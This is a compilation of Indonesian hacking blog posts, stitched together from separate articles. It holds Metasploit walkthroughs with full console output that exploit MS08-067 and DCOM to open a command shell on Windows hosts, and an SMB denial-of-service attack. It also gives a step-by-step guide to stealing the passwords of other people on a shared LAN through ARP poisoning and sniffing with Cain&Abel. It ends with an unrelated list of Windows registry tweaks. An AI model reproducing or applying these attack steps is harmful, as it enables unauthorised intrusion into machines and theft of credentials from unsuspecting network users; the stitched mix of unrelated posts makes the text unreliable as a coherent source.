[*] exec: sudo nmap -v -sS -A -O 192.168.1.28
[sudo] password for test:Starting Nmap 4.62 ( http://nmap.org ) at 2009-03-21 23:50 CIT
Initiating ARP Ping Scan at 23:50
Scanning 192.168.1.28 [1 port]
Host 192.168.1.28 appears to be up ... good.
Interesting ports on 192.168.1.28:
Not shown: 1712 closed ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
MAC Address: 00:1E:8C:67:59:F9 (Asustek Computer)
Device type: general purpose
Running: Microsoft Windows XP
OS details: Microsoft Windows 2000 SP4, or Windows XP SP2 or SP3
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=258 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows

Dari hasil scan kita ketahui bahwa kemungkinan OS-nya menggunakan OS Windows XP dengan port 445-nya terbuka. Mari kita coba kompi ini dengan menggunakan exploit windows/smb/ms08_067_netapi.

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Lihat opsi dari exploit ini dengan mengetikkan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:
Id Name
-- ----
0 Automatic Targeting

Dari opsi diatas, maka kita perlu set terlebih dahulu RHOST ( komputer target) dengan mengetikkan :

msf exploit(ms08_067_netapi) > set rhost 192.168.1.28
rhost => 192.168.1.28

Untuk RPORT, kita tidak perlu melakukan setting apa-apa karena vulnerability ini memang mengeksploitasi vulnerability di port 445. Untuk exploit target diisi dengan OS komputer target. Dalam langkah ini kita menggunakan angka 0 yang berarti automatic target. Untuk melihat OS target apa saja, ketik :

msf exploit(ms08_067_netapi) > show targets

Exploit targets:
Id Name
-- ----
0 Automatic Targeting
1 Windows 2000 Universal
2 Windows XP SP0/SP1 Universal
3 Windows XP SP2 English (NX)
4 Windows XP SP3 English (NX)
-------- cut -----------

Sekarang kita tentukan jenis payload yang ingin dipakai. Dalam langkah ini saya ingin menggunakan tcp_bind shell (akses command prompt di kompi target) :

msf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcp
payloads => windows/shell_bind_tcp

Untuk melihat payload apa saja dalam metasploit, gunakan perintah :

msf exploit(ms08_067_netapi) > show payloads

Compatible payloads
===================
Name Description
---- -----------
generic/debug_trap Generic x86 Debug Trap
generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)
generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)
generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager
----------- dipotong sampai disini ---------------

Nahh.. setting sudah selesai dilakukan. Untuk melihat hasil konfigurasinya bisa dicek kembali dengan menggunakan show options :

msf exploit(ms08_067_netapi) > show options

Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.1.28 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique: seh, thread, process
LPORT 4444 yes The local port
RHOST 192.168.1.28 no The target address
Exploit target:
Id Name
-- ----
0 Automatic Targeting

sekarang jalankan exploit :

msf exploit(ms08_067_netapi) > exploit

[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:33270 -> 192.168.1.28:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.28
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254

C:\WINDOWS\system32>

Dan ternyata emang masih bolong… :p

Metasploit : msfcli
Dari langkah-langkah diatas… sebenarnya bisa dilakukan exploitasi dengan menggunakan satu perintah dari console, dan diakomodir dengan menggunakan msfcli yang notabene sebenarnya adalah metasploit command line interface.
Untuk melihat manual perintahnya bisa dilihat dari help maupun manpage-nya wiki-nya metasploit.

sinchan@hydra:~$ msfcli –help

[*] Please wait while we load the module tree...
Error: Invalid module: --help
Usage: /usr/local/bin/msfcli [mode]
=================================================================
Mode Description
---- -----------
(H)elp You're looking at it baby!
(S)ummary Show information about this module
(O)ptions Show available options for this module
(A)dvanced Show available advanced options for this module
(I)DS Evasion Show available ids evasion options for this module
(P)ayloads Show available payloads for this module
(T)argets Show available targets for this exploit module
(AC)tions Show available actions for this auxiliary module
(C)heck Run the check routine of the selected module
(E)xecute Execute the selected module

So.. mari kita coba. Contoh kasusnya sama seperti artikel msfconsole biar ndak capek nulisnya yaitu:

IP Addr Target : 192.168.1.28
Port target : 445
Exploit : windows/smb/ms08_067_netapi
Payload : windows/shell_bind_tcp
Exploit target : 0

Dan implementasinya menjadi seperti ini :

sinchan@hydra:~$ msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.1.28 TARGET=0 PAYLOAD=generic/shell_bind_tcp E

[*] Please wait while we load the module tree...
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability...
[*] Command shell session 1 opened (192.168.1.6:36804 -> 192.168.1.28:4444)

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.1.28
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.254
C:\WINDOWS\system32>

Implementasi yang sama juga bisa dilakukan pada metasploit GUI (msfgui) dan metasploit berbasis web (msfweb). Silahkan dicoba sendiri karena saya malas upload gambarnya :-p. Dari teknik dasar ini silahkan dikembangkan dengan teknik-teknik yang lain.
Artikel ini sebenarnya pengen saya lanjutkan dengan db_auotpwn, tapi ternyata capek juga nulis segini panjang. Yah terpaksa bikin berseri : Metasploit II : Mass exploitation. Nyusul yah….


WARNING!!!!!! INI HANYA UNTUK PEMBELAJARAN SEMATA, MOHON JANGAN DISALAH GUNAKAN!!!

Metasploit Part 2

Metaspolit adalah sebuah projek yang bertujuan untuk pengembangan exploit, shellcode, pen-test, IDS signature n dll.. salah satu tool yang disediakan adalah Metasploit Framework yang memungkinkan kita untuk mencoba bahkan mengembangkan exploit2 yang ada di librarinya... Saat ini Metasploit Framework sudah mencapai versi 3.1 tersedia untuk platform Windows dan *NIX... yuuukkk kita coba...


Pertama ya harus donlod dulu frameworknya di : http://www.metasploit.com/framework/ pilihlah sesuai platform yang digunakan :P



Kedua, install paket framework.. kalo di windows cukup klik 2 kali ajah file setupannya.. kalo di *NIX cukup ekstrak file *.tar.gz nya n langsung jalanin file executable yang ada didalamnya... Catatan : Framework 3.1 hanya bisa berjalan di Ruby >= 1.8.2 .



Ada 3 executable yg bisa dijalankan, antaranya metasploit web, metasploit GUI dan metasploit console... sesuai jenisnya, GUI berarti berjalan di desktop (application desktop), Web berjalan di browser, dan console berupa command line.


OK, pada dasarnya di framework ini sudah dikategorikan exploit2 yang akan digunakan berdasarkan tipe protokol yang akan diserang, misal kategori http untuk protokol HTTP, smb untuk protokol SMB dan sebagainya...


Kalo gw pribadi sih sering nyoba2 dengan kombinasi NMAP (http://nmap.org/download.html).. NMAP digunakan untuk meng-sccan target dengan argumen -sS [ip_address/ip_address_range].


Setelah terkumpul informasi dari hasil NMAP barulah kita pilah2 protokol2 yang tersedia atau "terbuka" di host target... hehehehhehehe


Untuk penyerangan terhadap WinXP (SP0/SP1/SP2) yang efektif (menurut gw loohh :P) bisa menggunakan module DOS (Denial Of Service) dgn protokol SMB dan exploitnya adalah Microsoft SRV.SYS Pipe Transaction No Null, apa sih yg diserang? "This module exploits a NULL pointer dereference flaw in the SRV.SYS driver of the Windows operating system." Hasil yang didapat adalah host target akan reboot bahkan kadang terjadi BSOD (Blue Screen Of Death)...

Metasploit

Rasa penasaran saya muncul ketika banyak forum security membicarakan tentang Metasploit.

Apakah itu metasploit ? Sulitkah menggunakannnya ? Saatnya membuka sedikit rahasia para Lamer (Hacker kelas teri) yang seringkali menyombongkan diri, padahal yang mereka lakukan hanyalah menggunakan tools yang dapat digunakan oleh anak SMP sekalipun.

Untuk memberikan gambaran dan mempermudah penjelasan, saya akan memberikan contoh bug pada service DCOM Windows yang dulu sangat populer dimanfaatkan oleh teman-teman SMA saya dengan exploit terpopuler saat itu : KAHT (dimana saya tidak tertarik hacking pada waktu itu) untuk menembus Server Lab sekolah - yang akhirnya ketahuan dan dimarahi guru Lab .Feeling saya sih mereka berusaha mengambil soal ulangan yang diketik di server, dasar anak bandel, hehehe….

Berikut alat-alat praktek yang kita butuhkan pada percobaan kali ini :

1. Sebuah PC yang cukup bertenaga untuk virtualisasi PC.

2. Metasploit Framework, dapat di download disini http://www.metasploit.com/

3. Microsoft Windows NT SP3-6a/2000/XP/2003 yang memiliki bug pada service DCOM.

4. Vmware, dapat di download disini https://www.vmware.com/tryvmware/?eval=workstation-w

Vmware disini digunakan untuk membuat virtualisasi jaringan komputer, sehingga memudahkan anda yang hanya memiliki 1 PC saja dirumah.

Saya akan melompati langkah-langkah menginstall VMware dan juga cara menginstall Windows di VMware, sebab apabila anda tidak mengerti hal tersebut, kemungkinan besar anda juga tidak akan paham yang kita bahas disini.

Sebagai permulaan kita akan memulai dengan mengenal lebih dekat Metasploit Framework. Pada situs pembuatnya dipaparkan secara gamblang tentang apa itu Metasploit framework, dan juga tujuan penggunaannya :

What is it?

The Metasploit Framework is a development platform for creating security tools and exploits. The framework is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
What does it do?

The framework consists of tools, libraries, modules, and user interfaces. The basic function of the framework is a module launcher, allowing the user to configure an exploit module and launch it at a target system. If the exploit succeeds, the payload is executed on the target and the user is provided with a shell to interact with the payload.

Semuanya saya biarkan tertulis dalam bahasa orang bule sebab ada kata-kata yang tidak pas atau tidak bisa dipadankan bila diterjemahkan dalam Bahasa Indonesia.

Selanjutnya untuk lebih jauh tentang exploit maupun bug pada DCOM service dapat anda search sendiri di google, sebab terlalu panjang jika saya jelaskan disini.

Sekarang mari kita ngoprek komputer !
Langkah pertama adalah download Vmware dari situsnya, lalu anda dapat mulai menginstall Windows yang memiliki bug DCOM, kemudian jalankan windows anda di VMware !

Langkah kedua adalah download Metasploit Framework dari situsnya. Lalu install dikomputer anda dan jalankan, hingga keluar tampilan
Kemudian pada kotak search ketikan dcom, lalu klik Find, dan pilihlah Exploits Microsoft RPC DCOM Interface Overflow.

Setelah itu kita memilih target yang akan kita exploitasi, dalam kasus kali ini Sistem Operasi target kita adalah Windows XP home, oleh karena itu pilihlah yang sesuai, lalu klik Forward :

Kemudian kita dihadapkan pada pilihan payload. Payload adalah sebuah aksi yang dilakukan setelah bug berhasil di exploitasi oleh Metasploit. Untuk pembelajaran, kita pilih Generic/Shell_Bind_TCP , artinya kita akan mengambil alih Shell Bind atau lebih dikenal di lingkungan windows dengan Command Prompt dari target hacking kita. Setelah itu klik Forward.

Langkah berikutnya kita harus menentukan Target Address kita, disini saya telah mengkonfigurasi Windows XP Home di Vmware dengan IP 192.168.126.132, oleh karena itu tuliskan ip tersebut pada kolom RHOST. Sedangkan RPORT disini sudah ditentukan yaitu port 135 yang merupakan port default dari service DCOM dimana secara default dibuka oleh Windows XP Home ! Wah, berbahaya sekali yah… Untuk LPORT disini juga sudah ditentukan yaitu 4444, Local Port akan membuka sebuah port di PC anda untuk berhubungan dengan komputer target. Selanjutnya klik Forward .

Setelah semua konfigurasi selesai, anda akan mendapatkan pesan konfirmasi seperti berikut, jika anda yakin semuanya telah benar,lanjutkan dengan klik Apply.

Jika target berhasil terexploitasi, anda akan mendapatkan sebuah session yang berisi target hacking kita dan siap untuk di double klik.

Kemudian anda akan mendapati sebuah layar Command Prompt dari komputer target dan anda sebagai Administrator. Jika sudah begini semua terserah anda, jangan tanyakan apa yang bisa dilakukan selanjutnya.Dan selesailah tutorial hacking kali ini Mudah bukan ?

LAN Hacking

Cara hacking via LAN (untuk curi pass orang2 yang lagi browsing)

Pertama-tama sorry kalo repost karena teknik ini bukanlah teknik yang fresh di dunia hacking tapi teknik ini belum basi karena sampai saat ini masih dapat digunakan karena sebagian besar jaringan meggunakan jaringan hub & switch yang tidak terenkripsi.
Mengapa tidak terenkripsi?

* Network Admin sebagian besar adalah orang IT yang specialist dalam membuat program, bukan dalam Network Security
* Bila dienkripsi bandwidth yang dibuthkan akan meningkat dan tentu inet yang sudah lemot ini akan semakin lemot dan akhirnya page error
* Harganya tidak murah untuk memperoleh yang terenkripsi

Perbedaan antara jaringan Hub dan Switch:

* Pada jaringan hub semua data yang mengalir di jaringan dapat dilihat/diambil oleh komputer manapun yang ada di jaringan asalakan komputer tersebut merequest data tersebut, kalo tidak direquest ya tidak akan datang.
* Pada jaringan switch hanya komputer yang melakukan pertukaran data yang dapat melihat data tersebut, komputer2 lain tidak berhak merequest data tersebut.

Masalahnya adalah harga dari router hub dan switch tidak berbeda jauh sehingga kebanyakan tempat sekarang sudah menggunakan metode switch yang menyulitkan untuk network hacking.

Hacking ini menggunakan teknik:

* Sniffing
* ARP Poison Routing

Kedua Teknik di atas tidak akan bisa dicegah oleh firewall apapun di komputer korban, dijamin.

Important Note: ARP Poison Routing dapat meyebabkan denial of service (dos) pada salah satu / semua komputer pada network anda

Kelebihan:

* Tidak akan terdeteksi oleh firewall tipe dan seri apapun karena kelemahannya terletak pada sistem jaringan bukan pada komputernya
* Bisa mencuri semua jenis login password yang melalui server HTTP
* Bisa mencuri semua login password orang yang ada di jaringan Hub selama program diaktifkan
* Untuk ARP Poisoning bisa digunakan untuk mencuri password di HTTPS
* Semua programnya free

Kekurangan:

* Untuk jaringan Switch harus di ARP poisoning 1 persatu dan bandwidth anda akan termakan banyak untuk hal itu (kalo inet super cepat ga masalah)
* Ketahuan / tidak oleh admin jaringan di luar tanggung jawab saya

Mulai dari sini anggap bahwa di network dalam kisah ini ada 3 komputer, yaitu:

* Komputer Korban
* Komputer Hacker
* Server

Perbedaan-perbedaan antara jaringan switch dan jaringan hub:
Langkah-langkah pertama:

1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:

http://www.wireshark.org/download.html
http://www.oxid.it/cain.html



Cara Menggunakan WireShark:

* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa “Capture packets in promiscuous mode” on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik “Follow TCP Stream” dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya

Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
Dari cara di atas anda dapat mengetahui bahwa jaringan anda adalah hub/switch dengan melihat pada kolom IP Source dan IP Destination. Bila pada setiap baris salah satu dari keduanya merupakan ip anda maka dapat dipastikan jaringan anda adalah jaringan switch, bila tidak ya berarti sebaliknya.

Cara Menggunakan Cain&Abel:

* Penggunaan program ini jauh lebih mudah dan simple daripada menggunakan wireshark, tetapi bila anda menginginkan semua packet yang sudah keluar dan masuk disarankan anda menggunakan program wireshark
* Buka program Cain anda
* Klik pada bagian configure
* Pada bagian “Sniffer” pilih ethernet card yang akan anda gunakan
* Pada bagian “HTTP Fields” anda harus menambahkan username fields dan password fields nya apabila yang anda inginkan tidak ada di daftar.
Sebagai contoh saya akan beritahukan bahwa kalo anda mau hack password Friendster anda harus menambahkan di username fields dan passworsd fields kata name, untuk yang lain anda bisa mencarinya dengan menekan klik kanan view source dan anda harus mencari variabel input dari login dan password website tersebut. Yang sudah ada di defaultnya rasanyan sudah cukup lengkap, anda dapat mencuri pass yang ada di klubmentari tanpa menambah apapun.
* Setelah itu apply settingannya dan klik ok
* Di menu utama terdapat 8 tab, dan yang akan dibahas hanya 1 tab yaitu tab “Sniffer” karena itu pilih lah tab tersebut dan jangan pindah2 dari tab tersebut untuk mencegah kebingungan anda sendiri
* Aktifkan Sniffer dengan cara klik tombol sniffer yang ada di atas tab2 tersebut, carilah tombol yang tulisannya “Start/Stop Sniffer”
* Bila anda ada di jaringan hub saat ini anda sudah bisa mengetahui password yang masuk dengan cara klik tab (Kali ini tab yang ada di bawah bukan yang di tengah, yang ditengah sudah tidak usah diklik-klik lagi) “Passwords”
* Anda tinggal memilih password dari koneksi mana yang ingin anda lihat akan sudah terdaftar di sana
* Bila anda ternyata ada di jaringan switch, ini membutuhkan perjuangan lebih, anda harus mengaktifkan APR yang tombolonya ada di sebelah kanan Sniffer (Dan ini tidak dijamin berhasil karena manage dari switch jauh lebih lengkap&secure dari hub)
* Sebelum diaktifkan pada tab sniffer yang bagian bawah pilih APR
* Akan terlihat 2 buah list yang masih kosong, klik list kosong bagian atas kemudian klik tombol “+” (Bentuknya seperti itu) yang ada di jajaran tombol sniffer APR dll
* Akan ada 2 buah field yang berisi semua host yang ada di jaringan anda
* Hubungkan antara alamat ip korban dan alamat ip gateway server (untuk mengetahui alamat gateway server klik start pada komp anda pilih run ketik cmd lalu ketik ipconfig pada command prompt)
* Setelah itu baru aktifkan APR, dan semua data dari komp korban ke server dapat anda lihat dengan cara yang sama.

Anda dapat menjalankan kedua program di atas secara bersamaan (Cain untuk APR dan wireshark untuk packet sniffing) bila ingin hasil yang lebih maksimal.

Password yang bisa anda curi adalah password yang ada di server HTTP (server yang tidak terenkripsi), bila data tersebut ada di server yang terenkripsi maka anda harus mendekripsi data tersebut sebelum memperoleh passwordnya (dan itu akan membutuhkan langkah2 yang jauh lebih panjang dari cara hack ini)

Untuk istilah-istilah yang tidak ngerti bisa dicari di wikipedia (tapi yang inggris ya kalo yang indo jg belum tentu ada).

Percepat Windows

Percepat Windows, Lebih Aman, dan Lebih Produktif…

Fungsi klik-kanan merupakan cara yang sangat baik untuk mempelajari beberapa fungsi Windows yang tersembunyi. Ingin lebih? Cobalah Anda mulai menjelajahi aplikasi Control Panel dan temukan beberapa teknik yang bermanfaat. Dan masih ada lagi aplikasi Command Line pada folder Windows’ System32. Tapi, tidak ada satupun yang bisa menandingi Registry.

Registry dilengkapi dengan berbagai pengaturan yang bermanfaat untuk meningkatkan kinerja, memperbaiki lubang keamanan, dan bahkan mengubah basis fundamental Windows untuk bekerja lebih baik. Walaupun terlihat sangat canggih, Anda tetap perlu untuk berhati-hati dalam menggunakannya karena bukan hanya fitur yang membantu tetapi juga banyak perangkap.

Jika tidak berhati-hati, Anda justru malah menambahkan masalah dari pada memecahkannya. Untuk itu, di bawah ini terdapat 20 hack yang bisa Anda coba untuk membuat PC Anda menjadi lebih baik. Selamat mencoba!!

1. Tingkatkan Keamanan
Seseorang yang tidak diinginkan bisa dengan mudah mengambil data Anda dengan USB apabila ia berhasil mengakses PC Anda secara fisik. Jika Anda menggunakan Windows XP2 atau versi sesudahnya, ada sebuah cara sederhana untuk mencegahnya.

Masuk ke "HKLM\SYSTEM\CurrentControlSet\Control\StorageDevicePolicies", buatlah sebuah nilai DWORD yang disebut "WriteProtect" dan atur pada nilai "1". Anda akan bisa membaca drive USB, tetapi tidak bisa memindahkan data ke dalamnya lagi.

2. Kendalikan UAC
Kendali Akun Pengguna milik Vista sangat sering memunculkan peringatan-peringatan yang akhirnya dimatikan oleh para pengguna. Tapi, kadang justru membuat mereka kelewatan fitur-fitur yang bermanfaat seperti mode perlindungan untuk IE. Anda bisa mengendalikannya dengan cara menonaktifkan peringatan bagi administrator, jadi Anda tidak perlu terganggu, namun UAC tetap bekerja pada latar belakang dan Anda masih bisa mendapatkan fitur-fiturnya.

Untuk melakukan ini, masuk ke "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin", dan atur nilainya menjadi "0". Untuk mengembalikannya ke kondisi normal, atur nilainya menjadi "2".

3. Ubah Pemilik
Instalasikan Windows pada PC dan Anda pasti akan diminta untuk memasukan nama, yang kemudian akan disimpan sebagai pemilik yang terdaftar (jalankan WinVer untuk melihat ini pada sistem Anda). Jika Anda membeli sebuah komputer bekas, mungkin Anda ingin mengganti nama pemiliknya dengan nama sendiri. Hmm..tak ada cara lain selain dengan Registry.
br>Masuk ke dalam "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion" dan akan melihat dua kalimat "RegisteredOwner" dan "RegisteredOrganization". Klik ganda pada keduanya untuk mengganti.

4. Mengurutkan File dengan Benar
Mengurutkan nama file pada Explorer bisa menjadi suatu masalah. Pengaturan awal, ia akan menempatkan "File_v2.txt" sebelum "File_v15.txt", dan itu bukanlah urutan ASCII, tetapi terlihat lebih masuk akal. Tetapi, bagaimana jika "v" merujuk kepada nomor versi, dan seharusnya "File_v15.txt" di urutan terdahulu? Pada saat ini, sistem awal Explorer tidak bisa bekerja sama sekali.

Untuk mengembalikan pengurutan berdasarkan ASCII yang biasa, masuk ke "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", buatlah nilai DWORD yang disebut "NoStrCmpLogical" dan atur nilainya menjadi "1". Hapus kode tersebut jika ingin kembali ke kondisi awal Explorer yang standar.

5. Troubleshoot Startup
Jika Windows membutuhkan waktu yang terlalu lama untuk start up maupun shut down, kemungkinan ia sedang memiliki maslah. Untuk mengetahui apa yang sedang terjadi kembali masuk "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", buatlah sebuah nilai DWORD yang disebut "verbosestatus" dan atur nilainya menjadi "1". Restart PC Anda dan Windows akan memberitahu Anda apa yang sedang terjadi.

6. Mengatur Tipe-Tipe Folder
Explorer milik Vista akan secara cerdas memilih tipe folder Anda berdasarkan isinya. Tetapi, hal ini berarti folder download Anda akan berubah menjadi folder musik jika Anda mengunduh beberapa MP3. Untuk memperbaiki ini, masuk ke dalam "HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shelf", hapus subkey "Bags" dan buat yang baru pada lokasi yang sama.

Buatlah kunci bernama "AllFolders" di bawah Bags, dan kunci lain bernama "Shell" di bawahnya lagi. Kemudian klik padanya untuk membuka "HCU\Software\Classes\LocalSettings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell". Klik kanan pada bagian kanan panel, pilih "New | String Value" dan namakan ini "FolderType". Kemudian, klik ganda pada FolderType dan atur nilainya menjadi "NotSpecified". Anda masih bisa mengubah tipe folder, tapi Vista tidak akan mengubahnya secara otomatis.

7. Enkripsi dengan Mudah
Beberapa versi Windows memungkinkan Anda untuk mengenkripsi file, walaupun prosesnya agak aneh. Anda harus mengklik-kanan pada file, pilih "properties", tekan tombol "Advanced, cek "Encrypt contents to secure data", dan tekan "OK" sebanyak 2x. Untuk cara yang lebih sederhana, masuk ke "HKLM\SOFTWARE\Microsoft\Windows\Current\Version\Explorer\Advanced" buat DWORD yang bernama "EncryptionContextMenu" dan atur nilainya menjadi "1". Sekarang Anda cukup hanya mengklik-kanan pada file dan pilih "Encrypt".

8. Akses Folder dengan Cepat
Akses folder dengan cepat dengan memunculkannya pada Start Menu, Ketik "REGEDIT" pada "Run", masuk ke "HKCR\Folder\shellex\ContextMenuHandlers", klik-kanan "ContextMenuHandlers" dan klik "New | Key" Ketik " dan tekan [Enter]. Sekarang, tahan [Shift], klik-kanan pada sebuah folder, dan pilih "Pin to Start Menu".

9. Percepat Waktu Peng-Kopian
Vista memberikan prioritas yang tinggi untuk soundcard Anda, jadi Anda butuh untuk mendapatkan audio yang bebas dari masalah tanpa peduli apa yang PC Anda sedang proses. Karena hal tersebut bisa memperlambat proses pengkopian pada jaringan.

Untuk memperbaikinya, masuk ke "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Multimedia\SystemProfile". Coba atur "NetworkThrottlingIndex" menjadi lebih 10 – 50 atau 60 sudah cukup efektif, kemudian reboot dan uji kecepatan jaringan Anda. Untuk informasi lebih, klik di sini.

10. Perbaiki Listing Drive
Jika Explorer tidak lagi menampilkan DVD drive Anda, masuk ke "HKLM\System\CurrentControlSet\Control\Class\" dan hapus pengaturan "UpperFilters" atau "LowerFilters". Tips ini biasanya bekerja, tapi kadang bisa gagal jika memang aplikasi bersangkutan sudah bermasalah dari awalnya. Jika program berhenti bekerja, coba lihat apakah terdapat update, kemudian reinstall.

11. Akses Pengaturan Tampilan dengan Cepat
Klik-kanan saja pada desktop Windows Vista tidak cukup untuk membawa Anda langsung kepada menu pengaturan tampilan. Windows 7 sudah dipersiapkan untuk memperbaiki hal ini. Tapi, untuk sementara Anda bisa melakukannya dengan masuk ke "HKCR\Directory\Background\Shell", klik-kanan "Shell", pilih "New | Key" dan namakan "Display Settings".

Klik-ganda "(Default)" oada bagian kanan panel dan masukkan "Display Settings" pada kotak Value Data. Sekarang, klik-kanan "Display Settings" pada bagian kiri panel, pilih "New | Key" kembali, dan namakan fungsi ini sebagai "command".

Klik-ganda pada nilai Default fungsi-fungsi baru tersebut dan masukkan teks berikut ini: "rundll32 shell32.dll,Control_RunDLL DESK.CPL,@0,3". Klik "OK" dan klik-kanan pada desktop untuk melihat opsi pengaturan tampilan yang baru.

12. Multiple Live Messenger Log-In
Biasanya, Windows Live Messenger (WLM) hanya memungkinkan Anda untuk masuk ke dalam satu akun saja pada satu waktu tertentu. Untuk membuatnya menjadi lebih dari satu, masuk ke "HKLM\Software\Microsoft\WindowsLive\Messenger", buat nilai DWORD yang bernama "Multiple Instances" dan atur nilainya menjadi "1". Untuk mengembalikan ke kondisi semula, cukup hapus nilai tersebut.

13. Bersihkan Menu-Menu
Anda telah meng-unsinstall sebuah aplikasi, tapi ia malah meninggalkan Anda sebuah cinderamata berupa ikon-ikon yang tidak berguna. Untuk memperbaiki ini, masuk ke "HKCR\*" dan "HKCR\Directory". Perlebar panelnya, kemudian pilih "shellex\ContextMenuHandlers" dan lihat berbagai tombol di bawahnya yang berhubungan dengan perintah yang tidak Anda inginkan.

Pada PC, fungsi "HKCR\*\shellex\ContextMenuHandlers\7-Zip" berhubungangan dengan menu konteks 7-Zip, sebagai contohnya, untuk menghapusnya, klik "Delete" pada bagian kiri panel. Tapi hati-hati, sebaiknya Anda hanya menghapus jika sudah 100% yakin pada menu yang tepat.

14. Percepat Back-Up
Fitur NTCBACKUP milik Windows XP meningkatkan kinerjanya dengan mempertahankan daftar file sistem yang ia tahu kalau Anda tidak akan mungkin ingin membuat back-upnya. Tambahkan file dan folder yang Anda inginkan sendiri dan dapatkan hasil yang lebih baik lagi.

Lihat daftarnya pada "HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FileNotToBackup".

15. Ubah Folder Instalasi Default
Kebanyakan instalasi default adalah folder Program Files, tapi jika Anda ingin menggantinya, masuk ke "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion", ubah "ProgramFilesDir" menjadi folder pilihan Anda dan reboot

16. Mengubah Nama Drive
Menambahkan sebuah pembaca kartu memori dan Explorer akan sering kali menghentikan folder komputer yang memiliki nama drive yang mirip. ("Removable Drive D: ", "Removable Drive E: ", dan seterusnya), membuatnya menjadi susah untuk membedakannya.

Anda bisa mengatasinya dengan "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer". Buatlah tombol dengan huruf dari drive (sebagai contoh "G"), dan di dalamnya buatlah lagi tombol baru yang bernama "DefaultLabel". Klik-ganda pada tempat memasukkan nilainya, berilah nama "CompactFlash" (atau apapun sesuka Anda), dan klik "OK". Restart Explorer atau tekan [F5] dan lihat perubahannya. Drive G: akan terbaca sebagai "CompactFlash (G:)".

17. Wipe the Page File
Windows menyimpan memori halaman-halaman pada file paging selama Anda bekerja. Semuanya terdengar baik, sampai seseorang berhasil mengakses sistem Anda, menemukan file-file tersebut, dan menambahkan atau justru mengurangi sesuatu yang tidak Anda inginkan.

Untuk mengatasinya, masuk ke "HKLM\SYSTEM\CurrentControlSet\Control\SessionManager\MemoryManagement", atur nilai "ClearPageFileAtShutdown" menjadi 1 dan reboot. Windows akan menghapus semua file halaman ketika ia dimatikan. Memang memperpanjang durasi dan proses, tapi meningkatkan keamanan.

18. Crash on Cue
Layar biru crash biasanya membawa kabar buruk, tetapi kadang Anda mungkin ingin memunculkannya untuk menguji laporan eror Windows misalnya. Ternyata trik Registry bisa membantu Anda bahkan untuk hal yang satu ini.

Masuk ke "HKLM\SYSTEM\CurrentControlSet\Services\i8042prt\Parameters", buat DWORD bernama "CrashOnCtrlScroll" dan atur nilainya menjadi 1. Reboot komputer Anda, dan untuk meng-crash cukup tahan [Ctrl] kanan dan tekan [Scroll Lock] dua kali. Setelah selesai, pastikan Anda segera menghapus perintah tersebut.

